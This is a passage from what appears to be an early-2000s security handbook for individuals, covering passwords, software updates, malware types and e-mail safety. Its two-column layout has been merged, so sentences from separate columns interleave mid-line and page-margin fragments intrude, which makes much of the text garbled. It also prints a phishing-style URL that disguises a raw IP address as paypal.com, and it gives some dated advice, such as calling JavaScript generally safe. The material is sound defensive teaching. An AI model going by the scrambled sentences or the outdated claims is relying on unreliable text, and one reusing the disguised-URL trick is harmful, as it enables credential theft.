the key. In other cases, it is not possible to decrypt the password (one- · Do you want your username to reveal who you way encryption); when you enter a password while log- really are? Will this username be used to help ging on, it is encrypted and compared to the version on your friends and colleagues recognize you? disk (see Addendum 1 on Encryption for more details). An e-mail address is often such a username. Due to poor security on some host systems, at times it · Do you want the username to help conceal your may be possible for attackers to access the entire password true identity? If you are using this name to table and find the encrypted passwords for all users. Even participate in some group activity (such as an if these passwords use one-way encryption and cannot be online game or chat group), you might not want decrypted, it may still be possible for the attacker to people to know who you really are. determine what your password is. The encryption algorithm used for these passwords is typically documented and · Do you want this username to be easy for you known. The attacker could use this algorithm to encrypt to remember? If it is a username for some online all the words in a dictionary, as well as other commonly service that you visit infrequently, you might want used passwords. So if you used the word "birthday" as to pick a username that you will not forget. your password, when the attacker encrypted the word Some people use the same username for many "birthday," he would find that the encrypted version is services, if there is not critical or valuable the same as what is on disk and would now know your information associated with these services. password! · Do you want this username to be difficult for other Since the whole idea of passwords is to make it difficult people to guess? If it is the username to access your for someone to guess, but to allow you to sign on at will, bank account, you might want to make it difficult for one can state a number of criteria and techniques associ- others to guess what it is (this goes back to the ated with robust passwords. Like usernames, each system concept that effective security is made up of multiple, has certain rules regarding the password formats (mini- partially redundant layers; if you use your publicly mum and maximum size, what characters are valid, etc.) known e-mail address to access your bank, it makes it easier for a thief to "guess" your bank username). · Never use single words in your native language (or English) as a password. A phrase or a sentence, or several word fragments is much better. · If the system treats upper and lower case as different letters, use both, and do not place them where they would be used in normal writing. Information Technology Security Handbook SECURITY FOR INDIVIDUALS 41 · Mix numbers, allowed punctuation, and blank spaces, o Your birthday, or the birthday of any of your if the system allows it. friends or relatives · If the system allows blank spaces and your password o Your address, phone number, license plate number is a phrase, consider omitting some of the spaces or similar identifiers (that is, have the words run together). o Your favorite color · To make your passwords easy to remember, you may o Your job title or rank be tempted to use the same password for many o Your company name or school name systems. If you do this, remember that once an o Anything else that is commonly identified with you attacker discovers your password on one of these o Classic passwords such as "xyzzy" or "plover" systems, he or she can make a pretty good guess (passwords used in the first computer game), that it is the password on your other systems, "abracadabra" and "open sesame" P so only do this for systems where you have o Words in popular movies, news or literature. ART absolutely nothing to protect. For example, Examples are "Harry Potter", "Lord of the Rings", some newspapers require a username and password and "Gone with the Wind". to read articles on their web site. No money or o Letters on the keyboard in order confidential information is involved, they just want (such as "SDFGHJ") TW you to log on, and so it may be all right to use the o Adding a single digit before or after any of same password for newspapers and similar reading the above. O material. o Repetitions of the same letters or numbers, or in · Some people replace letters in words with similar sequence ("aaaa9999", "123456", "ABCDEFG") looking numbers or punctuation. They use the digit · Some systems require a minimum number of characters "1" for the letters "I" or L", the number "3" or the in a password or a certain number of letters and/or symbol "#" for the letter "E", the digit "0" for the digits. Although long is good, as is mixed case, if you letter "O", the symbol "@" for the letter "A" and the are not a very good typist, think about whether some digit "5" for the letter "S." This is a useful artifice, but one looking over your shoulder will be able to figure remember, a good attacker knows about these tricks out what you are typing. and they make his job a little bit harder, but not · Whatever the password is, you will have to remember impossible. it, preferably without writing it down. If you need to · Replace the letter "I" with the string "eye" or "aye" or write down a password, never write it near where it whatever makes sense in your language. This works will be used, or with a label on it identifying it as particularly well with words like "icon" which is now a password. "eyecon." · Never keep an unencrypted list of passwords in a · Use acronyms (the first letters of the words in some computer file. familiar expression). For example, "tgbwc" is an acronym for the Coca Cola slogan "Things go better The best password is a very long string of random numbers with Coke." and letters. However, for most of us, this would be · Spelling words backwards slightly obscures the words impossible to remember and a password that is written but does not make them much harder to crack. on a note on your computer screen or under your keyboard · Never use: is not secure. o Your username, or some variation of it o Your name Here are some examples of reasonable passwords (for a o Your maiden name system that accepts letters, numbers, special symbols o Your spouses name or maiden name and blanks, and treats upper and lower case as different o Your children's names letters) along with variations of each. They are memorable o Your parent's names and yet not easily guessed or found in a dictionary. o Your pet's names o Your co-worker's, boss's or friends names 42 INFORMATION SECURITY AND GOVERNMENT POLICIES Password Comment reason, change it immediately after they are finished. Computers Are Useful Something many computer Sharing passwords is generally a bad thing, and users will agree with. should be avoided unless there is no alternative. Computers aReuseFul One blank missing, funny · Change you password periodically, just in case it has capitalization. been compromised. "Periodically" is subjective, but C0mputer5@reus#fv1 Digit 0 for letter 0, 5 for s, between six months and a year is reasonable. @ for a, # for E, V for U, 1 · If you belong to an organization that has a more for L, no blanks. stringent policy, follow it. comp9uter8sare7usef6ul The original expression, with no blanks and with Restrict Privileges digits interspersed every four characters. Most systems allow users to be given a restricted set comutrsareusful The original expression of privileges; this set may not include all the privileges with a few letters missing. granted to the person who administers the computer. onupatithwa In many countries where For computers where the user is also the administrator there is a tradition of story (as is the case for many personal computers), the user telling, there are standard often does all of his/her work using the full set of forms for beginning the privileges (often called root or administrator privileges). story. In English speaking It is good practice to use a separate username when areas, children's stories non-administrative work is being done. This reduced often began: " Once upon the chances that the user will damage the system a time, there was ...." In by accident. It also reduces the chance that if the this example, each word is system is penetrated, the attacker will have full truncated to two letters to administrator privileges. limit the length, which makes it less recognizable than "onceuponatimetherewas". oNup@T-1thuua The same thing, but with some substitutions, upper case letters, and arbitrary punctuation inserted. Changing your Password Passwords should be changed periodically. The frequency of changes is the subject of debate. Some security specialists recommend changing passwords very often, but others argue that making changes too frequently increases the need to write passwords down or pick simplistic passwords. For typical applications, the following recommendations are realistic: · Change your password immediately if you think that it may have been compromised. · If you give your password to someone else for any Information Technology Security Handbook SECURITY FOR INDIVIDUALS 43 CHAPTER 4. have and they will list what updates are available. KEEPING YOUR OPERATING SYSTEM In some cases, it is completely clear what updates are AND APPLICATION SOFTWARE SECURE relevant for your computer; in other cases the choices are less obvious. Once you have decided what updates At a Glance you need, you download them onto your computer. The next step is to apply the update. Depending on the software, this may mean running the program that This chapter investigates techniques you can use you have just downloaded or following the steps outlined to reduce the chances that your operating system in the accompanying documentation or instructions. and applications software are vulnerable to In some cases, once the update is downloaded, it will security breaches. install itself automatically. P Introduction ART In recent years, there have been three new trends: Principle 1: Computers run programs. 1. For complex programs such as Microsoft Windows, Principle 2: Programs have bugs. Microsoft provides software via their web site TW ("Windows Update"). An applet inspects your Principle 1 is obvious. Given that people write programs computer and gives you a list of updates that O and people are not perfect, Principle 2 is expected. It is apply to your system. You can then download not clear, however, why there are so many security- and install these updates as described above. related bugs. Problems such as buffer overflows (see definitions in Addendum 3) are easy to avoid; 2. The update that you find and install as described nevertheless, they seem to be involved in almost half of is not really the actual update, but a program that all known security bugs. will, while it is running, download and install the Commercial Software actual update. So, for instance, you might find that there is a major update to one of your programs. When you look at it you will see that it is only How does it normally work? 500,000 bytes ­ really small for a software update. In fact, this is just the program that will download Several years ago, when you bought PC-type software, the real upgrade and install it ­ the real upgrade that was it; no updates were available until you bought consisting of perhaps 30,000,000 bytes. the next version. Now most software is updated regularly, particularly for security problems. For some software such 3. Some programs have built-in functions that will as operating systems, "regularly" means almost daily.25 dynamically check to see if updates are available For most products, there is no charge for updates. and may even install them (with your permission). Many companies that offer commercial software also These capabilities were designed to make your life provide some updates to address bugs in general, and easier. In all cases, the task of selecting exactly what security vulnerabilities in particular. In the case of larger updates you need (a complex task for operating vendors, you can go to the corporate web site, click on systems and certain applications) is completed for a "support" or "downloads" tab and find any available you by the programs. fixes for their products. Typically, when you go to a software supplier's web site, you identify what software packages and versions you 25In October 2003, following a severe security problem related to a problem in Microsoft Windows, Microsoft decided that it was unreasonable and unrealistic to have users apply patches weekly, and that in the future, they would only issue monthly updates unless a problem was severe and urgent. 44 INFORMATION SECURITY AND GOVERNMENT POLICIES The developing country conundrum reliable and trustworthy, they could become a way to distribute Trojans and viruses. As you can see, many of these processes are designed to run online and typically involve downloading many Should you install updates as soon as they megabytes of updates. That works well if you have a are available? high-speed connection to the Internet (greater than 1 megabyte per second), or a dialup connection where This has been a debate among computer professionals for you can remain connected for several hours. In developing decades. The two arguments are: countries, however, this is often not the case. There are two alternatives to address this problem: Pro: If you install updates immediately, you protect 1. Don't update your system and applications. yourself from failures that are already known. In the 2. Have someone else download the update and case of security-related updates, you will protect provide detailed instructions for how to install it. yourself from penetrations and exposures that the The update can be distributed on CD or via a local original system allowed. area network, if there is one. Con: Anytime programmers write code, they can make The first alternative is not acceptable given the rise in mistakes or break some other part of the program. security risks. So, the only reasonable alternative is to This applies to updates as well as to the original pro work cooperatively to download and share the updates. grams, so there is a chance that the update will introduce new problems that are unrelated to the There are several vehicles for doing this: problems it is designed to fix. · If an organization owns multiple machines, a local The problem of attackers and criminals using security technical support person should take responsibility for flaws to penetrate systems and alter or destroy data has downloading updates and installing them or making changed the scope of the problem. Once a security flaw them available to others. is announced, even if the announcement comes with a · Computer clubs or other groups could download patch, attackers will immediately create viruses and other updates and make them available to their members. tools to exploit the problem. Those who do not imple- · For individual users, Internet Service Providers (ISPs) ment security fixes quickly may be compromised. could offer a service whereby they get the updates for popular products and common operating systems and Today's conventional wisdom: distribute them locally. This could also reduce the ISP's requirement for international bandwidth, · Novice users and those who use their computers for reducing their costs. non-critical tasks should apply all updates soon after · Computer stores that sell the machines can make the they are available. The risk of introducing new updates available to their customers. problems through the updates is lower than the risk · During a flurry of computer worm vulnerabilities in of having a seriously out-of-date machine. 2003, Microsoft began distributing some updates on CDs locally in various countries. Perhaps this practice · Sophisticated users and technical administrative will be continued. staff should install security-related updates immediately, but they can defer larger overall The last three types of software update distribution are upgrades that may have multiple functional changes not prevalent, but given the increased need to keep soft- in them. Delaying for a few weeks or months may ware up to date, they may become a sensible commercial allow more adventurous users to install the upgrades, strategy for ISPs and vendors in the developing world. discover the problems, and report them, giving the Although this will be a welcome support strategy for manufacturer an opportunity to fix the flaws before users, they will need to ensure that the source of these you install the overall upgrade on your system. local updates is reliable and trustworthy. If they are not Information Technology Security Handbook SECURITY FOR INDIVIDUALS 45 If your computers are used for business applications, support, even though the original software was free. it is always a good policy to test all changes and new Red Hat's version of Linux, which is available both software on an identical, but non-critical computer for free and through commercial vendors, is a good before applying them to your production machines. example. Organizations that desire a higher level of You can never tell when a change will stop an existing technical support may find it worthwhile to purchase application from working properly. the package or at least the services to support it.26 It is important to note that, as with some free software, Non-traditional and non-commercial if you decide to use the software at no charge and with- software out paid support, the period for which security fixes are available may be quite short. Therefore, if you select The previous discussion focused mainly on commercial non-support software for your operating system or other P offerings including operating systems and major critical sub-systems, you may need to upgrade to new ART applications that are common to many computing versions very often (perhaps as every six months). environments. How does the situation change with other types of software? The update processes for Open Source products tend to be more difficult that those for Windows, but are TW Shareware and small-supplier commercial software in line with other Unix products and the installation procedures for the original Open Source products. O There is a vast amount of software that is offered for There are Open Source Windows-based products that free, or for a modest cost. The level of support offered by distribute binaries and use simple installers as well. suppliers varies enormously. In general, upgrades are offered periodically, either for free or for a small fee. As with Windows-type systems, updates and patches These programs do not tend to have security for large Open Source systems are sizable themselves. exposures, so their upgrades are aimed at fixing It is important to identify local sources of these updates non-security flaws or adding functionality; as such to reduce Internet download times for individual users. they are beyond the focus of this book. However, some freeware applications, such as firewalls and One final issue related to Open Source software is worth virus checkers do fall in our domain and will be some discussion. There is an ongoing debate between discussed later in this book. advocates of Open Source and advocates of traditional proprietary software regarding which product is more If you use programs that have clear security secure. implications, make sure you understand what the supplier's upgrade policy is. You do not want to be Proprietary software advocates say: in a position where you are using security-sensitive software and the upgrade support suddenly disappears · since the source is available for Open Source products, or you cannot afford to buy it. Deploying software attackers can easily analyze the code and locate all of such as a virus checker that is not regularly the flaws which they can exploit; (daily or weekly) updated may be more dangerous than not using one at all, because if you use it, · since a large number of people in different locations you may be working under a false sense of security. and without organizational ties may be working on a given Open Source product, standards may be lax and Open Source software the uneven integration of the various components may cause security vulnerabilities; Open Source software that is in active development tends to be well supported. In some cases, there may be fee- based services available for upgrades and 26See selected links on Linux and other Open Source projects in the Annex on Electronic Resources. 46 INFORMATION SECURITY AND GOVERNMENT POLICIES · since the people working on proprietary products are 1) It is possible that pirated software may not paid by the manufacturer, they follow instructions and be updateable, or that an update may stop it the quality is uniform (and high); from working. 2) Some pirated software includes other "goodies" · since no single authority is responsible for some Open that you may not have expected. These can include Source products, security could be ignored if it does backdoors, keyboard loggers or other malicious not happen to be important to any of the individual software. developers. Open Source advocates say: · since so many people are working on the source, problems tend to be recognized by the "good guys" and fixed quickly; · the people working on proprietary products may generate uniform quality code, but it may not be secure if the manufacturer does not value security highly; · with proprietary programs, you are at the mercy of the manufacturer to fix problems, and that may cause long delays. In fact, each of these arguments has some validity to it. There is no way to ensure that either proprietary or Open Source software is secure or that problems will be discovered and fixed in a timely manner. In both types of software, there are examples of exemplary behavior and of careless behavior on the part of their respective designers and support organizations. Pirated Software Neither the authors nor the publisher of this book advocate software piracy, but it would be foolish to pretend that it does not exist. Software piracy is a problem throughout the world, but it is particularly relevant in countries where the relative cost of legitimate software compared to wages far exceeds that in developed countries and where local laws and law enforcement make punishment highly unlikely. Aside from the potential for legal liability due to violating the product owner's property rights, there are two issues related to security and pirated software that must be addressed. Neither is very common, but both are possible. Information Technology Security Handbook SECURITY FOR INDIVIDUALS 47 CHAPTER 5. it a program and run that program. MALICIOUS SOFTWARE Some malware detection vendors consider a worm a type of virus. At a Glance Trojan This type of software is named after the (perhaps mythical) Greek conquest of The concept of malicious software is introduced. Troy, where the Greeks presented the city The various types of malicious software (such as viruses, of Troy with a large wooden horse. worms and Trojans) are discussed and the mechanisms When the horse was brought into the city, used to spread them are investigated. it was found to contain Greek soldiers Introduction who proceeded to take over the city. P Since then, a "Trojan Horse" has meant ART something that looks benign, but contains Malware some hidden and potentially dangerous Definition: Short for malicious software. Software content. designed specifically to damage or disrupt a system. TW A Trojan horse program is one that The first known microcomputer virus dates back to 1981. can do something malicious in addition O The concept of a computer worm was introduced in a sci- or instead of what the person thinks it is ence fiction book in 1975, and the first actual implemen- doing. The term has recently also come to tations were in the early 1980s. Interestingly, these mean any malicious program that is added worms were designed to do good things instead of mali- to your system without your knowledge or cious things. Computer Trojan Horses date back to the authorization. early days of time-sharing (1960s). Despite their long history, it is only in recent years that their impact on "Bonus" This is software that is included in normal users has been so severe and potentially software some other package without your dangerous. knowledge. It is common for commercial software to include other packages. To begin, we should first define what these terms mean.27 For instance if you install a web browser, it may also include Adobe Acrobat© or Virus A virus is a program that is attached software that plays music or videos. to or inserted into another program. When that program runs, the virus also These are included because they enhance runs and it inserts copies of itself into the original package and usually the other files or disks. In this way, install process asks you if you want them, it replicates itself. When the program or at least informs you that they are it infected runs, the whole process starts being installed. Bonus software is over again. The virus may or may not different because it is not really related do other things. to the original package in function. Given a choice, you probably would Worm A worm is similar to a virus, in that it not install it. replicates itself, but it does not need a host program. Like a virus, a worm may The terms Trojan, Virus and Worm are not mutually exclu- only replicate itself or it may take other sive. Attackers can write software with the characteristics actions as well. A worm can only work if of more than one, such as a self-replicating Trojan. there is some capability in a system that Software that has the characteristics of more than one form will allow an external source to send of malware is often called a blended threat. As you can 27See www.rbs2.com/cvirus.htm for further information on viruses and other potentially malicious programs. 48 INFORMATION SECURITY AND GOVERNMENT POLICIES see, the terms generally refer to how the malware is spread, image of your signature to allow you to print or fax and not what it does. This chapter describes what malware letters, this may also be useful. Together these pieces does and the specific ways in which it is propagated. The of information could allow the attacker to assume your following chapters discuss ways in which your computers identity. Alternatively, if you operate a small business and networks can be secured against such software. and store other people's credit card numbers on your computer, it will be a serious problem for you if these What do they do? numbers are stolen. There is no limit to how malware acts once it is running Over-write or erase data on your computer, but the programs do have some common characteristics in their activities: Some malware programs are truly malicious; upon entry to your computer, they can immediately begin to erase Send e-mail all the files on your hard disk or overwrite the files with garbage. Sometimes they change things in less Sending e-mail is one of the most common actions of detectable ways including: malware programs. The e-mail may include a copy of the program itself (a virus or a worm) as an attachment. The Installing a Trojan content may be specific to the malware (such as falsely claiming it is an alert from Microsoft warning you about This aspect of malware is becoming increasingly common. a security problem) or it may even be random parts of One or more programs may be installed on your computer. your previous e-mails that it finds lying around your The program may replace some common program that computer. If there is a malicious attachment included, you or the operating system normally use (the original the text of the message may be something that will meaning of Trojan). Alternatively, it may insert some encourage the recipient to open the attachment. The other program that will be invoked either at some pre- Subject: and the From: line are similarly set according to determined time or whenever your computer is started. the whim of the malware; they too may be set to The following section on Payload Software describes encourage you to open the attachment (as in the famous many of these programs. worm that said "I LOVE YOU" in the subject line). The messages are typically sent to people it finds in your Scheduling something to happen later address book or to people whose e-mail addresses are in other types of files on your computer. Sometimes when Any of the previous actions may happen immediately or messages have been sent to all possible recipients the they may be triggered at a later date. Malware writers program stops and sometimes it will start all over again! seem to like the suspense that comes with the Note that if someone else's computer is infected with a announcement that a certain worm will do something virus or worm that sends e-mail and it puts your address nasty on January 1, 2000, for instance in the From: line (because it found your address some- where on the infected machine, perhaps in its address Payload Software book), you may be accused of distributing this virus. Malware often comes in the form of programs left on Gather information your computer that run when you start your machine or when you start a particular program. The type Malware may gather information about your computer of program is only limited by the imagination and and its files and send this information back to its programming skill of the attacker. author. Since it can read any files on your computer (often including encrypted files), whatever you have is Web tracking/modification software fair game. If you store information about your bank accounts or credit cards on your computer, this data This class of programs watches what sites you visit, may be of interest to an attacker. If you have a scanned can display pop-up ads in addition to those you would Information Technology Security Handbook SECURITY FOR INDIVIDUALS 49 normally see, and can display ads replacing those that Keyboard loggers the site you are visiting is sending. They can send information about your computer and what you are Keyboard loggers do just what the name implies. They doing back to its developer. In many cases, the software trap all keyboard input and log it to disk. The file can will also have full control over your browser, watches be inspected later, perhaps via backdoor access, or it what you enter, and may alter what you see. When it can be sent back to the person who installed the watches what you enter, it can report these entries to program via e-mail or web delivery. its developer. For Internet Explorer, this capability is designed into the product and called a Browser Helper It is important to note that keyboard loggers watch Object (BHO) - http://msdn.microsoft.com/library/en- what you are actually typing, not what is sent over the us/dnwebgen/ html/bho.asp. Although one can build network. So if you enter a credit card number on a web P very useful and legitimate BHOs, there are also clearly page that is secure (uses encryption when the data is ART opportunities for less than ethical applications. transmitted), the logger still sees exactly what you typed in unencrypted form. Backdoor Software Financial Theft TW Normally to access a computer system, you need to give it a username and password, although this security Most thefts that are the result of personal computer O if often by-passed for systems that are thought of as attacks involve information that is taken from the being physically secure and used only in front of their computer. However, there are cases where payload own keyboard and monitor. Backdoor software allows a programs actually spend your money automatically. remote user to access your computer bypassing all of The simplest example is if the program detects a modem your security. It may even install its own security to on your computer and uses it to place long distance allow only that attacker to use it. Although the details calls. Since the program cannot talk, there is no benefit vary from case to case, this remote user will now have to the attacker, other than the malicious satisfaction in full control of your system; they could even lock you knowing that at the end of the month, you will get an out if they wished. In essence, your computer has been outrageous bill from the phone company. hijacked and you will not realize it. Why does this attacker want access to your system? The reasons vary, In other cases, the attacker can benefit personally. but they may include: In many countries, it is possible to arrange to have a special telephone number ­ when this number is called, · No reason other than to prove to himself or his the phone company will charge the caller a specific friends that he could do it; amount per minute and part of that money goes to the · To be malicious ­ in general; person being called. It is used for a variety of businesses, · To be malicious ­ he has some specific reason to but examples are software companies that want an easy target you; way of charging you when you call them for out-of-war- · To use your computer for some other activity such ranty support. In that case, the phone company collects as sending spam or launching a denial of service the money from the caller and sends part of it to the attack later; company being called to pay for the support call. If an · To steal something of value from your system. attacker had such a number, they could program your computer to call the number and just hold the line open Note that this same type of software, under names for a while. Your telephone bill would reflect this charge. such as remote access or remote administration tools has very legitimate, practical applications as well. If you use these tools for work, make sure that you have proper security measures employed, including usernames and passwords. 50 INFORMATION SECURITY AND GOVERNMENT POLICIES How do you get them? e-mail, however, that HTML can include instructions that cause problems. For example, the HTML can also A number of years ago, the only way a PC or Macintosh direct a web browser to go to a specific web site that user could be the recipient of a virus or other malware may not be appropriate for you or your children. was to use an infected diskette. If you didn't trade files It should be noted that the people who send these with people who were infected, you were safe. Unix sys- e-mails can be very innovative. Recently, there have tems were not particularly prone to viruses, but with been a number of virus-loaded e-mails that claim to their superior connectivity capabilities (even in those be from Microsoft and say that they are providing the days), security holes in operating systems and some latest patches to protect you from viruses and worms. common applications occasionally allowed attackers to They contain logos and images that could easily con- access systems and install backdoor software. The vince someone that they are authentic and that the Internet's first major security incident was a worm that attachments should be run immediately. Needless to say, attacked Unix systems in 1988. Today, you can be anyone who does run such an attachment is in for trouble. attacked in a number of ways. All of the following apply to Windows machines. Unix and Macintosh systems are Web sites somewhat less prone to these types of attack, not nec- essarily because they are more secure, but rather When the World Wide Web was launched, web pages because the vast number of Windows machines makes contained text and images. Now they can contain far them more interesting targets.28 Unix systems are next more, including dynamic programs that are downloaded in line, with Macintosh exhibiting the fewest exploited onto your machine and executed (Javascript, Java, vulnerabilities to date. ActiveX). If you allow your browser to run these pro- grams without determining that the sending site is e-mail completely trustworthy, then there is a good chance that the program may do something objectionable. A few years ago, rumors would spread periodically that Javascript is generally safe, but Java and ActiveX are you could be infected with a virus by receiving e-mail. potentially quite dangerous. Browsers can usually be System managers and helpdesk people would have to set to refuse these programs or to ask the user before reassure their users that this was impossible. As long as executing one. a user did not run a program that he or she received in an attachment without verifying that it was safe, the Plug-ins and Add-ons machine and the user were OK. Web browsers and many other programs (including word It is no longer impossible to be infected via e-mail, in processors and spreadsheets) allow other programs to fact, it is highly likely. Two enhancements brought this be loaded and executed from within the main program. about. The first change is that we now have e-mail A common example is the Adobe Acrobat Reader" programs that can run attachments automatically. which allows you to view PDF files while browsing the web. Once these add-ins or plug-ins are installed, Originally, a user would have to save the attachment they can do anything that the base program can do, and then run it. Now, automatically running attach- including (usually) read and write on disk, or use your ments makes things easier, particularly for the novice network connection. Add-ins and plug-ins should only user who wants to see what was sent without taking be installed if the source is known to be trustworthy. additional actions. The second change is that in an effort to make e-mail prettier and more powerful, we now allow HTML programming within the body of the 28Typically, a virus, worm or Trojan written for Unix may work only on the variant (Red Hat, Solaris, etc.) that it was written for, because the libraries that interface applications to the operating system differ on each type of Unix. As Linux becomes more popular and standardized, this advantage will be reduced. Information Technology Security Handbook SECURITY FOR INDIVIDUALS 51 Security holes Piggy-back on legitimate software Security holes are bugs in parts of the operating system or Although most software that you download is probably other system components that allow an attacker to access legitimate, it is increasingly likely that downloaded information on your system, or to gain control of the sys- software (particularly freeware) will install other tem. In recent years, most suppliers are reasonably quick programs as well. Peer-to-peer file sharing programs to respond to security problems that are discovered in have been particularly prone to this. They often include their systems, so if you apply patches to your system reg- other programs, many in the Web tracking/modification ularly, you may plug the holes before would-be attackers category, which monitor your web activity, display adver- build and distribute software exploiting the known bugs. tisements, and report on your activities to their masters. Some of these programs are particularly insidious in that P File sharing they try to disguise themselves and they are almost ART impossible to remove. One such program includes File sharing is available in one form or another for a uninstall utility; if you run it, it deletes the uninstaller all operating systems. It is very convenient to share but the original program is still alive and running! files among co-workers. If you have several machines of TW your own, sharing files between them is a great feature. Non-resident Malware However, if you allow file sharing over the Internet and O you don't apply adequate security measures (such as Not all malware runs on your computer. It is becoming robust usernames and passwords and limiting write and increasingly common to send e-mail that somehow update privileges) then any attacker in the world can entices the user to visit a web site. The traditional form also share your files. Further, if you allow others to of this trap is when an e-mail offers you something that write to your disks, then the attacker can set up your is of interest to you (just as with any of the common machine to do anything they want! spam sales e-mails), but once you go to their site, some sort of malicious software takes over, perhaps downloading Drive-by downloads software (what is referred to as a drive-by download) or taking other actions. Drive-by downloads occur when you innocently go to a web site and the HTML statements on the page automatically In the newer form, the e-mail claims to be from e-Bay invoke a Java or ActiveX program that downloads another (the Internet auction site) or PayPal (Internet pay- program and either executes it or schedules it for later ments) or from your bank. The e-mails are crafted to execution. The HTML code can also arrive in e-mail. If really look like they are authentic. They point you to a you allow Java or ActiveX programs to execute, they can web site to (typically) re-validate your credit card num- download and install whatever they want, without asking bers. The URLs that they point you to look exactly like your permission and without telling you what is happening. an authentic URL to the casual user. For instance, the real URL for PayPal is www.paypal.com. The URL which Piggy-back on pirated software displays in the e-mail might be exactly that. However, what is shown on the screen is not the actual URL that Pirated commercial software is not new. Counterfeit CDs will be used to access the web. The actual URL pointed have been sold for years and copies on the Internet to is often hidden and might be something like: (called Warez) are common. There has long been a http://www.paypal.com:user=32454329:transac- problem that the CDs could have a virus, but there tion=43293:code=4333033.33@218.5.79.162. is now an increasing chance that the software may deliberately include altered code giving access to If one is not very familiar with URL formats, it really your computer to an unauthorized person over the looks like it is going to www.paypal.com, so it must be Internet. Since administrator privileges are needed authentic. In fact, all of the data prior to the @ sign is to install most software, it is an ideal opportunity to ignored, and this goes to site 218.5.79.162. At that add a few more programs that you had not requested. site, you would see a page that looks exactly like the 52 INFORMATION SECURITY AND GOVERNMENT POLICIES PayPal site, asking you to log in and re-enter your credit card number. In fact, this site is not connected to PayPal at all, but rather belongs to someone who is trying to steal your credit card information. These ploys have been very successful. Note that e-mails similar to this may be legitimate. A legitimate e-mail will usually include some information unique to you (and not included in your e-mail address) in the mail, such as your full name or the last 4 digits of your credit card. If they direct you to a web site, they will either tell you where to go, but not include a hyperlink, or the result- ant web page will also include information that no spammer/fraud artist could know. If in any doubt, contact the company via telephone at their normal telephone number (not one included in the e-mail). Information Technology Security Handbook SECURITY FOR INDIVIDUALS 53 CHAPTER 6. The problem was that traditional e-mail allowed only SECURING SERVICES OVER NETWORKS printable text, and most files such as word processing files or executable programs contain non-printable char- At a Glance acters. The solution was to "encode" the non-printable information so that it was now printable. (Encoding is described in more detail in Addendum 1). This printable E-mail and the Web are the primary applications on file was inserted into the e-mail message, preceded by a the Internet. This chapter describes them in detail, signal that what followed was an encoded file. When investigating how they work and how careless use the e-mail message was received, this encoded file can result in security breaches. Other security-sensitive would be "decoded" back into the original form. Later, network-related topics covered include wireless the concept of attachments was generalized to allow communications, file sharing, and instant messaging. P encoding more types of file. The new methodology was ART General Issues called MIME (Multipurpose Internet Mail Extensions). Once attachments became common, e-mail programs were changed to open these attachments automatically, You should updates security patches for your software so that the recipient could see what had been sent to TW regularly. Although security problems can hurt you in them readily. many ways, you are most vulnerable when connected O to the Internet. If there is a security hole in your oper- At about the same time, the World Wide Web was ating system or application, you can be sure that the becoming popular and it used HTML to format web attackers know about it and will design ways to use it pages. HTML became one of the MIME encoding techniques, to infiltrate your computer. allowing e-mail to be formatted (changing fonts, colors, inserting images, pointing to web pages, etc.) as needed. Rule 4: Keep your operating system and key E-mail programs executed HTML automatically. application software up-to-date. Impact of enhanced e-mail By up-to-date, we do not necessarily mean the latest version of the software. Most companies and developers These enhancements made e-mail much more useful. will issue fixes to bugs (at least security-related bugs) Users could exchange all sorts of files easily. With skill- for older versions as well. Note that for free software, it ful use of fonts, color, and images, mail could be more is common for the developer to provide fixes only for pleasing to the eye and relatively simple formatting the most recent version; this means that to stay security could be employed without a word processing program. bug-free, you must regularly upgrade to the latest version However, these enhancements had some negative of the software. aspects as well. As mentioned previously, in the days E-mail before these enhancements were available, you could not get infected with a virus/worm directly through e-mail. As long as you did not run a program that you Evolution of e-mail received in an attachment without verifying that it was safe, you were OK. If you go back into network ancient history (10-30 years ago), e-mail was used for sending text messages. Now, programs that you receive could execute automati- Most of the systems that deployed e-mail also had some cally. HTML also executes automatically, which means way to transfer files. Typically though, the file transfer that it can send you to web sites that take malicious mechanisms were somewhat arcane and difficult to use. actions, including directly downloading malicious soft- This did not matter much when the main users of net- ware into your computer. In addition, specific HTML works were technology experts. However, as the use of commands could give the attacker control of your e-mail spread to the greater public, the application had machine, due to bugs discovered in the programs that to become easier to understand and to use. ran that HTML. 54 INFORMATION SECURITY AND GOVERNMENT POLICIES E-mail is NOT Authenticated all of their equivalents contain macro-capabilities that can include a virus. Even PDF files can contain malicious In most cases, the From: address of e-mail that is sent programs, although these programs are dangerous only over the Internet is not authenticated. This is a capabil- when viewed with the Adobe Acrobat program and not ity that has been heavily exploited by spammers. When the Adobe Reader which most people use. You should you Reply to e-mail, it normally goes back to whoever is check your user manual or help screens to see what listed in the From line. Sometimes, but not always, if capabilities may be turned off, especially if they are you look at the full headers (all of those almost incom- rarely used. prehensible "Received from" lines), it may be possible to roughly identify where the mail came from. Rule 8: Do not open an attachment from someone you do know and trust unless you are sure that How to protect yourself they sent it deliberately. Anyone who knows your e-mail address, or is able to It is possible for a colleague's machine to have a virus guess it,29 can send you an attachment. This attachment that causes this machine to send infected files to all of could be relevant and useful to you or it could be a the people in his or her address book. virus, a worm, or a Trojan, any of which could do a great deal of damage. Most current e-mail programs Rule 9: Consider configuring your e-mail program will not open attachments without your explicit request to not process "fancy" HTML and not to send it to (typically by clicking on the attachment), but if your other computers. program will open attachments automatically, turn the option off. This means that you will miss some images and other decorative things, but it also means that you will be in Rule 5: Configure your mail program not to open better control of your e-mail activities. Note that in attachments automatically. some e-mail programs, you don't even have to open a message to execute the HTML code, having it in the pre- Rule 6: Before opening any attachment, look at view screen is sufficient. Even though e-mail may con- the name to verify that it is not an executable tain HTML, many browsers and e-mail programs allow program. you to disable cookies, JavaScript, and plug-ins for pages that are received as part of e-mail messages. Virus writers are cunning. One often finds an attachment with a name like budget.xls.vbs. To the casual observer Rule 10: Check with your ISP to see if they are who does not know what vbs is, this looks like Microsoft checking e-mails for viruses and similar threats Excel spreadsheet named budget. In fact it is an exe- before delivering e-mail. cutable Visual Basic program named budget.xls. The xls is just part of the name and unrelated to the Excel Due to recent increases in the virus/worm activity, extension. The program could do anything it wished more and more ISPs are doing this. Note that this does including erase your hard disk. not alter any of these rules, as you cannot presume that your ISP filtering will be 100% effective, but your ISPs Rule 7: Never open an attachment from someone preventive actions will help in your security efforts. you do not know unless you are very sure that it is If your ISP is not aware of security issues, you may be a type of file that cannot contain malicious code. able to work with them to deliver better service to you and their other customers. Feel free to share this Remember that programs such as Microsoft Word (word Handbook with them! processing) and Microsoft Excel (data spreadsheets) and 29In the west, there is a children's story about a magical dwarf who promises to give a large reward if someone can guess his name. The person tries guessing many names, and eventually does guess the correct one ­ "Rumplestiltskin". To guess e-mail addresses, attackers repeatedly try many, many name variations in the hope that one of them will be 